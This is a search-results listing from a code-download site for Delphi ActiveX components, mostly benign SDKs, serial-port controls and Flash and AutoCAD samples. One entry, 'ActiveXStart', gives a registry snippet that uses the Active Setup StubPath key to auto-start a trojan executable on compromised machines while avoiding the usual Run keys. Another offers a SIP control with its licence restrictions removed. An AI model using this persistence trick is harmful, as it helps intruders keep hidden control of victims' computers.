Welcome![Sign In][Sign Up]
Location:
Search - delphi activex

Search list

[Internet-NetworkAnyChat

Description: AnyChat在线语音视频互动平台SDK包 “AnyChat在线游戏音视频互动平台”采用业界主流开发工具VC++开发,系统服务器 运行于WindowsNT平台,包括Windows 2000 、Windows 2003全系列版本,客户端采用ActiveX 技术,支持VC++、Delphi、VB、C++Builder等多种开发语言。-Interactive voice and video AnyChat online platform SDK package " AnyChat audio and video interactive online games platform" development tools, the industry' s mainstream VC++ development, system servers running on WindowsNT platform, including Windows 2000, Windows 2003 version of a full range of client-side using ActiveX technology, support for VC++, Delphi, VB, C++ Builder and other development languages.
Platform: | Size: 2467840 | Author: abu | Hits:

[ActiveX/DCOM/ATLimageocx

Description: 用delphi编写的activex/ocx控件,实现位图或者jpeg图形的显示、转换-delphi activex/ocx component to display or convert image.
Platform: | Size: 1556480 | Author: dream | Hits:

[Delphi/CppBuilderDelphi7ComponentsAndDistributedApplicationDevelopm

Description: 全书以组件与分布式应用开发为主题,贯穿示例深入浅出地介绍了Delphi7支持的组件技术,VCL库的扩充方法、可视组件的开发与发布、ActiveX控件技术、COM/DCOM/COM+的基本概念与原理、应用CORBA、分布式web与电子商务等-The book to components and distributed application development as the theme, runs through the sample learn more on the Delphi7 component technology supported, VCL library expansion methods, visual component-based development and publishing, ActiveX control technology, COM/DCOM/COM+ The basic concepts and principles, application of CORBA, a distributed web and e-commerce, etc.
Platform: | Size: 20488192 | Author: | Hits:

[ActiveX/DCOM/ATLFXPLC_DLL(Install)

Description: Windows下编写的FX全系列PLC通讯的通讯动态链接库。包含FX0N,FX1N,FX1S,FX2N,FX2NC,FX3U等;支持VB、VC、DELPHI、PB等开发环境;响应速度快,使用简单方便;有例程及详细使用说明;-Windows, to prepare a full range of FX Communications PLC communication dynamic link library. Contains FX0N, FX1N, FX1S, FX2N, FX2NC, FX3U, etc. support VB, VC, DELPHI, PB and other development environment response speed, the use of simple and convenient a routine and detailed instructions
Platform: | Size: 2545664 | Author: 方亮 | Hits:

[Delphi VCLIocomp.Components.v4.00.SP0.Delphi4_7_9_11.CBuild

Description: Iocomp s ActiveX/VCL Std Pack is a suite of 29 controls written for use in creating professional instrumentation applications using ActiveX or VCL development environments. These controls can be used for Scientific, Engineering, Medical, Oil and Gas, Semiconductor, Factory Automation, Aerospace, Military, Robotics, Telecommunications, Building and Home Automation, HMI, SCADA, and hundreds of other types of applications. All Iocomp controls are OPC-Enabled. If your project requires OPC connectivity, you can connect any property to your OPC Items/Tags. All connections can be made visually using the Iocomp property editor or can be performed dynamically through code. (Note: OPC features require a separate OPC Add-On License purchase)
Platform: | Size: 6949888 | Author: registroj | Hits:

[Com PortMsComm

Description: Delphi中MsComm控件的安装使用   Delphi 具有功能强大、简便易用和代码执行速度快等特点,是全球公认的快速应用开发工具技术的先驱者。但是在对串口通信的控制上Delphi的帮助文档和其他书籍中很少提及,这恰恰又是在开发应用系统时会经常遇到的问题。用过VB的程序员都知道 VB的MSComm通信控件具有丰富的与串口通信密切相关的属性及事件,提供了一系列标准通信命令的接口,可以用它创建全双工的、事件驱动的、高效实用的通信程序。在这里就介绍一下如何把MSComm这个ActiveX控件加入到Delphi中,充分发挥出二者的优越性。-Delphi, MsComm control installation
Platform: | Size: 1024 | Author: 钟立青 | Hits:

[Com PortMSComm-suer

Description: MSComm控件使用详解 MSComm 控件通过串行端口传输和接收数据,为应用程序提供串行通讯功能。MSComm控件在串口编程时非常方便,程序员不必去花时间去了解较为复杂的API函数,而且在VC、VB、Delphi等语言中均可使用。 Microsoft Communications Control(以下简称MSComm)是Microsoft公司提供的简化Windows下串行通信编程的ActiveX控件,它为应用程序提供了通过串行接口收发数据的简便方法。具体的来说,它提供了两种处理通信问题的方法:一是事件驱动(Event-driven)方法,一是查询法。-MSComm control the use of Xiangjie
Platform: | Size: 4096 | Author: 钟立青 | Hits:

[Delphi VCLEmailMessagingSystem

Description: delphi做的邮件短信系统 1.实现邮件检测功能: (1)注册账号,注意正确添写POP3服务器,用户名,密码。 2.实现发送短信功能: (1)在注册账号时要添写正确的手机号码,并选中发送到手机的复选框。 (2)跟据自己购买的GSM模块说明书设置串口参数,一般是“19200,n,8,1”。 (3)添写当地短信中心号码,前面的86可加可不加,如果没有写,系统在按“确定”后会自动加上。 (4)注意:如果短信中含有中文字符,则一定要设成Pdu模式,否则短信可能发送失败。 3. 源代码配置: (1)要加入ActiveX控件MSComm,否则程序无法编译。 (2)如果Delphi中没有NMPOP3控件(位于FastNet)控件组,则程序也无法编译,在Delphi 6 中一般默认都有。 (3)程序中用到的图标文件在程序的源代码目录的res文件夹下,读者可以选用自己的图标文件,这里可以任意更改,一般不会出见致命错误-E-mail messaging system 1. To achieve e-mail detection function: (1) A registered account, pay attention to the correct Tianxie POP3 server, user name, password. 2. To achieve SMS features: (1) The registration account when Tianxie the correct phone number, and select the check box to send to the phone. (2) with the GSM module, according to buy their own instructions to set serial port parameters, are generally "19200, n, 8,1". (3) Tianxie local messaging center number 86 can be added from time in front of Canada, if not written, the system click "OK" will automatically be added later. (4) Note: If the message contains Chinese characters, you must be set to Pdu mode, otherwise the message may send fail. 3. The source code configuration: (1) to join the ActiveX control MSComm, otherwise the program does not compile. (2) If Delphi does not NMPOP3 control (located in FastNet) control group, the program can not compile in Delphi 6 are generally the default. (3) pr
Platform: | Size: 684032 | Author: 李飞 | Hits:

[ActiveX/DCOM/ATLDelphi_FlashActiveX

Description: 一個可讓 Delphi 展現 Flash and ActiveX 強大的功能, 含源碼, 適用於 Delphi 5, 6, 7.-This is a strong functions, it makse Flash and ActiveX in Delphi Tool, (Source Code included) For Delphi 5, 6, 7.
Platform: | Size: 51200 | Author: john | Hits:

[GUI DevelopEWDraw_3D_ActiveX_5_5

Description: EWDraw 3D is a powerful vector graphics ActiveX for 3D and 2D visualisation and animation. You can use it for CAD,CAM,GIS and others. The EWDraw is based on Open CASCADE geometric kernel and openGL. The component is realized as a run-time Windows 32 bit OCX (ActiveX control). Either can be used with applications written in the popular Visual IDE languages such as Visual Basic, Delphi, C++ Builder , Visual C++, .NET and INTERNET.
Platform: | Size: 21175296 | Author: Fire | Hits:

[ActiveX/DCOM/ATLActiveXStart

Description: ActiveX 自启动方式有很多木马在使用,好象国内的比较少,最近突然多起来了 由于我一向在 网吧上网,内网肉鸡通常是上不了线的,所以需要端口映射,于是我在几台服务器肉鸡上装了 Vidc 这个东西,可惜 vidc 1.2 服务端是不会自己启动的,所以就需要动手改造。随便研究了一下,呵呵。安装为服务?注册表Run键? [attach=130] 可惜现在是个鸟,无论 老鸟还是菜鸟都喜欢去查看这几个地方,加是什么 优化大师 的帮助,很快,改造的木马over了,其实我们不妨使用下 ActiveX 详细信息看下面的代码 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{4A202188-F04D-11cf-64CD-31FFAFEECF20}] "StubPath"="sunray.exe" 其中的 {4A202188-F04D-11cf-64CD-31FFAFEECF20} 即为启动键值,可以随机替换为合理的值 把上面的代码保存为 run.reg 导入注册表,每次开机就会启动 系统目录下的 sunray.exe -There are many ways since the launch of ActiveX Trojan in use, if the domestic is relatively small, the recent sudden increased recently in As I have always been in the cafe Internet, Intranet chickens usually are not able to line, so the need for port mapping, so I have a few servers broiler upload a Vidc this thing, unfortunately vidc 1.2 server will not start their own, so we need to Hands-transformation. Casual study a little, He He. Installed as a service? Registry Run keys? [attach = 130] Unfortunately, now is a bird or a rookie like both fields and then go to see these places, plus What is the optimal master s help, quickly transform the Trojans over, but in fact we may use the following ActiveX For more information see the following code Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components (4A202188-F04D-11cf-64CD-31FFAFEECF20)] "StubPath" = "sunray.exe" Where (4A202188-F04D-11cf-64CD-31FFAFEECF20) shal
Platform: | Size: 3072 | Author: Gougou | Hits:

[ActiveX/DCOM/ATLVaxSIPUserAgentOCX

Description: sip软电话客户端activex控件,已去除使用限制-sip soft phone client activex control, use restrictions have been removed
Platform: | Size: 138240 | Author: raindong | Hits:

[Delphi VCLtpapro_4.07

Description: tpapro_4.07开发传真控件,功能强大,支持传真、终端、voip等,带源码,支持Borland Delphi3-7, C++Builder3-6-Async Professional is a comprehensive communications toolkit for Borland Delphi, C++Builder, & ActiveX environments. It provides direct access to serial ports, TAPI, and the Microsoft Speech API. It supports faxing, terminal emulation, VOIP, & more. This is a source-only release of TurboPower Async Professional (APRO). It includes designtime and runtime packages for Delphi 3 through 7 and C++Builder 3 through 6.
Platform: | Size: 9200640 | Author: try | Hits:

[ActiveX/DCOM/ATLlizard

Description: how to use the Mozilla controle activex the replacement of windows internet explorer component
Platform: | Size: 4121600 | Author: tndeath | Hits:

[Multimedia Developcad

Description: Delphi / AutoCAD ActiveX Automation Code Examples and Resources All material accessable from this page is free for your personal use. However, all of same are copyrighted works*, which are NOT in the public domain. (*see specific exceptions below). You are free to use this material for personal use and in applications you build and distribute, but you may not sell, lease, or mass-redistribute this material, in any form, including electronically. You may not post this material online (including but not limited to web sites, ftp sites, bulletin boards, or any other online service) for public downloading. Feel free to post links to this page on your web site. If you do, please notify me via email.-Delphi / AutoCAD ActiveX Automation Code Examples and Resources All material accessable from this page is free for your personal use. However, all of same are copyrighted works*, which are NOT in the public domain. (*see specific exceptions below). You are free to use this material for personal use and in applications you build and distribute, but you may not sell, lease, or mass-redistribute this material, in any form, including electronically. You may not post this material online (including but not limited to web sites, ftp sites, bulletin boards, or any other online service) for public downloading. Feel free to post links to this page on your web site. If you do, please notify me via email.
Platform: | Size: 1323008 | Author: mauro00001 | Hits:

[Delphi VCLCompile_ActiveX_Using_DLL_Tech

Description: 在Delphi中使用dll创建插件,实现插件的即插即用!-Compile_ActiveX_Using_DLL_Tech
Platform: | Size: 672768 | Author: wangboct100729 | Hits:

[ActiveX/DCOM/ATLOCXCALLJS

Description: DELPHI7写的OCX,在IE中使用,做到网页中调用delphi的窗体、事件,delphi调用网页中js函数.-DELPHI7 written OCX, used in IE, do a Web page form called delphi, event, delphi js function call page.
Platform: | Size: 239616 | Author: th | Hits:

[Delphi VCLSmartFlash3.11

Description: SmartFlash is a VCL with additional features in Macromedia Flash ActiveX. SmartFlash support real trasparency of the flash and antialiasing effect in the flash frame.
Platform: | Size: 6432768 | Author: doshka | Hits:

[Delphi VCLVideoCap_Pro_Video_Capture_ActiveX_SDK_4.01

Description: visconsoft video capture activex v.4
Platform: | Size: 6913024 | Author: soun | Hits:

[Delphi VCLDelphiSample

Description: 透過Delphi程序控制AutoCAD之ActiveX方法-AutoCAD program control through the Delphi method of ActiveX
Platform: | Size: 78848 | Author: david | Hits:
« 1 2 3 45 6 7 8 9 »

CodeBus www.codebus.net